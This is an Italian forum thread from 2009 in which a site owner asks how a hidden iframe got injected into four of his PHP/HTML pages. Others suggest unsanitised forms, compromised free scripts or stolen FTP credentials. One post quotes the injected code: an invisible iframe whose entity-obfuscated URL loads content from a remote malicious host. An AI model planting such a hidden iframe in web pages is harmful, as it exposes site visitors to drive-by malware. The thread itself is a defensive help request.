Proteggersi da un code injection (credo)

**grollaz** · 23-07-2009, 14:17

[Premessa: sperando di aver scelto il forum giusto e la sezione appropriata..]

Ciao, settimana scorsa qualcuno mi ha inserito in alcune pagine html e php contenenti un form, un iframe con richiamo ad un codice malefico, come potersi proteggere? come può essere accaduto?

Il servere è linux di aruba..

Grazie a tutti!!!

**TheDarkITA** · 23-07-2009, 14:27

I tuoi script sono aggiornati?

**Uno** · 23-07-2009, 15:23

Un form dovrebbe anche nella versione 0.001 avere un filtro, una maschera di immissione che impedisce l'uso di tutto quello che non è richiesto o in caso che almeno lo entitizzi se il form deve poter contenere anche codice e/o caratteri diversi dai normali alfanumerici.

Se non si conosce un pelo di php o altri linguaggi di scripting lato server bisognerebbe evitare di mettere su form presi in giro (tutta la comunità informatica online sarebbe grata). Se invece erano compresi in un cms allora sarebbe meglio stare alla larga da quel cms

Dopo la premessa, il codice era realmente malefico o era appunto entitizzato e quindi solo un tentativo andato a male?

Prima che mi chiedi che significa entitizzato

Codice PHP:


<?php echo "ciao mondo" ?>

questo sopra è entitizzato, il codice c'è ma non ha valore, non funziona detto in parole povere

**grollaz** · 23-07-2009, 16:01

Ciao, il codice inserito a fondo pagina per l'esattezza prima del tag di chiusura </body> era questo

Codice:

<iframe src="http://jL.ch&#117;ra.pl&#47;rc/" style="d&#105;splay:none"></iframe>

Lo script del form è quello generato da un form generator trovato online.

Detto questo, possono essere entrati dal form in qualche modo?
O potrebbero aver trovato la password ftp?

I file corrotti su varie centinaia erano solo 4..

Grazie.

**TheDarkITA** · 23-07-2009, 16:02

Senza sapere il sorgente del form, è impossibile risponderti.

**grollaz** · 23-07-2009, 16:23

Forse risolto, ho analizzato e cercato il codice inserito, e leggo che è un virus nel pc che genera queste stringhe in vari casi.. su vari file, e poi quando li carichi online.. trac!! quindi grazie del supporto, ed ora lascio la palla a chi ha realizzato quella pagina.

Buona serata a tutti.

**Uno** · 23-07-2009, 20:03

Originariamente Scritto da grollaz

Lo script del form è quello generato da un form generator trovato online.

guarda che non sia questo il problema, nascondono porcherie in parecchie risorse gratuite purtroppo, per farti un esempio ci sono template gratuiti di wordpress che se va bene hanno nascosti una sfilza di link a siti poco seri, se va male.....

**Derevko** · 23-07-2009, 23:07

Originariamente Scritto da grollaz

Detto questo, possono essere entrati dal form in qualche modo?
O potrebbero aver trovato la password ftp?

In genere agiscono tramite ftp, controlla la tua macchina.

**ale** · 24-07-2009, 07:48

Senza sapere che software è installato è impossibile dire di più. Può darsi tutto, da un form che non verifica per HTML tags (il classico htmlentities o htmlspecialchars in PHP) fino a puro accesso sul shell.